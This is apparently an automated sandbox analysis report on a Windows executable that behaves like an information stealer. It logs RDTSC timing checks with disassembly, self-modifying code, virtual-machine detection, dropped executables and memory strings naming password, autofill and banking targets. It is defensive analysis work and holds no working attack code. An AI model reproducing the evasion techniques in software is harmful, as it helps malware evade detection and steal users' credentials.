                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0688 second address: 0000000004DB068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB068C second address: 0000000004DB06B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 44h 0x0000000b jmp 00007F7E954D64AFh 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ax, bx 0x00000017 movsx edi, si 0x0000001a popad 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB06B1 second address: 0000000004DB0723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7E95375D07h 0x00000011 and cl, FFFFFFBEh 0x00000014 jmp 00007F7E95375D09h 0x00000019 popfd 0x0000001a mov bh, ah 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F7E95375D04h 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0723 second address: 0000000004DB0728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0728 second address: 0000000004DB0743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, dl 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0743 second address: 0000000004DB079E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E954D64ABh 0x00000009 jmp 00007F7E954D64B3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F7E954D64B8h 0x00000015 and si, 2BD8h 0x0000001a jmp 00007F7E954D64ABh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov si, C2A1h 0x0000002b mov edi, ecx 0x0000002d popad 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB079E second address: 0000000004DB07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E95375D00h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB07CA second address: 0000000004DB07CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB07CE second address: 0000000004DB07D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB07D4 second address: 0000000004DB0816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E954D64ACh 0x00000009 add ah, FFFFFFC8h 0x0000000c jmp 00007F7E954D64ABh 0x00000011 popfd 0x00000012 call 00007F7E954D64B8h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0816 second address: 0000000004DB081A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB081A second address: 0000000004DB081E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB081E second address: 0000000004DB0824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB0824 second address: 0000000004DB082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB082A second address: 0000000004DB082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB082E second address: 0000000004DB084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E954D64AFh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB084A second address: 0000000004DB08E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dx, cx 0x00000011 push ecx 0x00000012 pop ebx 0x00000013 popad 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 mov dword ptr [esp+24h], 00000000h 0x00000020 jmp 00007F7E95375CFCh 0x00000025 lock bts dword ptr [edi], 00000000h 0x0000002a pushad 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F7E95375CFAh 0x00000034 sub cx, A478h 0x00000039 jmp 00007F7E95375CFBh 0x0000003e popfd 0x0000003f popad 0x00000040 mov di, cx 0x00000043 popad 0x00000044 jc 00007F7F07917875h 0x0000004a pushad 0x0000004b call 00007F7E95375D00h 0x00000050 pop edi 0x00000051 popad 0x00000052 pop edi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F7E95375D06h 0x0000005a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB08E6 second address: 0000000004DB08EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000004DB08EC second address: 0000000004DB090F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E95375CFDh 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Special instruction interceptor: First address: 000000000016F9B8 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Special instruction interceptor: First address: 000000000016F93F instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Special instruction interceptor: First address: 000000000031BB93 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Special instruction interceptor: First address: 000000000016F906 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Special instruction interceptor: First address: 00000000003A4775 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 0000000000B2F9B8 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 0000000000B2F93F instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 0000000000CDBB93 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 0000000000B2F906 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 0000000000D64775 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 000000000048F9B8 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 000000000048F93F instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 000000000063BB93 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 000000000048F906 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 00000000006C4775 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe Special instruction interceptor: First address: 000000000108582D instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe Special instruction interceptor: First address: 00000000010ADACF instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe Special instruction interceptor: First address: 0000000000EEBCB5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe Special instruction interceptor: First address: 00000000011099BD instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Special instruction interceptor: First address: 00000000010F582D instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Special instruction interceptor: First address: 000000000111DACF instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Special instruction interceptor: First address: 0000000000F5BCB5 instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Special instruction interceptor: First address: 00000000011799BD instructions caused by: Self-modifying code
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe Code function: 0_2_04D10D98 rdtsc 0_2_04D10D98
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2591
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1635
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2581
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2239
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 391
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1090
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1155
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 963
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1256
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 920
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 1183
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe Window / User API: threadDelayed 4810
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\plaza[1].exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\niks[1].exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\ZLGJz1zjooaGjpiGIhT0.exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\plaza[1].exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\zs1nXDHCjbiIGotgg4qJ.exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\well[1].exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\HgvXSle13lm2R30FoCuW.exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UdgmfEtw7ukqXx7vdO3L.exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\ZUEHnz5YzDsyCHbnegZs.exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\well[1].exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\yk50FvD1XOCg2Y2iAkjB.exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\fkGORKNF0MOvzFIhlS3N.exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\well[1].exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ladas[1].exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UP_uKSEYzgg0BHrTE9Qz.exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\dZPbe9okQutRw6uffMvo.exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\niks[1].exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\IK6nP7Vsyy6xQfngv8hq.exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\RhvHlFoQ86AMGIsTANJB.exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\1tu3JEnOc1WEcDVr1Q0N.exe
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ladas[1].exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-70046
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 3184Thread sleep time: -44022s >= -30000s
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 5412Thread sleep time: -40000s >= -30000s
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 5700Thread sleep time: -46023s >= -30000s
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 3004Thread sleep time: -30015s >= -30000s
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 5672Thread sleep time: -56028s >= -30000s
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 4600Thread sleep time: -50025s >= -30000s
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exe TID: 5676Thread sleep time: -46023s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5740Thread sleep count: 44 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5740Thread sleep time: -88044s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6052Thread sleep count: 2591 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6052Thread sleep time: -5184591s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5896Thread sleep count: 1635 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5896Thread sleep time: -3271635s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3236Thread sleep time: -52000s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6048Thread sleep count: 60 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6048Thread sleep time: -120060s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2976Thread sleep count: 205 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2976Thread sleep time: -410205s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5476Thread sleep count: 184 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5476Thread sleep time: -368184s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5920Thread sleep count: 2581 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5920Thread sleep time: -5164581s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5980Thread sleep count: 2239 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5980Thread sleep time: -4480239s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1056Thread sleep count: 284 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1056Thread sleep time: -568284s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3516Thread sleep count: 391 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3516Thread sleep time: -782391s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6332Thread sleep time: -52000s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4920Thread sleep count: 1090 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4920Thread sleep time: -2181090s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3504Thread sleep count: 1155 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 3504Thread sleep time: -2311155s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4924Thread sleep count: 963 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 4924Thread sleep time: -1926963s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5028Thread sleep count: 1256 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 5028Thread sleep time: -2513256s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6452Thread sleep count: 920 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6452Thread sleep time: -1840920s >= -30000s
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7092Thread sleep count: 1183 > 30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7092Thread sleep time: -2367183s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe TID: 1668Thread sleep time: -48100s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeThread sleep count: Count: 4810 delay: -10
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0003C050 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,__Mtx_unlock,0_2_0003C050
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0010B4E5 recv,FindFirstFileExW,0_2_0010B4E5
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_009FC050 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,__Mtx_unlock,6_2_009FC050
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00ACB4E5 recv,FindFirstFileExW,6_2_00ACB4E5
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\AppData
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\AppData\Local
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\AppData\Local\Temp
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nickname.utiitsl.comVMware20,1169648755
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CT name, value FROM autofillmain'.sqlite_masterr global passwords blocklistVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: billing_address_id.comVMware20,11696487
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r global passwords blocklistVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra Change Transaction PasswordVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,116x
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696
                          Source: RageMP131.exe, 0000000F.00000003.2394193590.00000000010B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                          Source: I2jCDr35mu.exe, 00000000.00000003.2258962424.0000000005C95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageformVMware20,11696487552
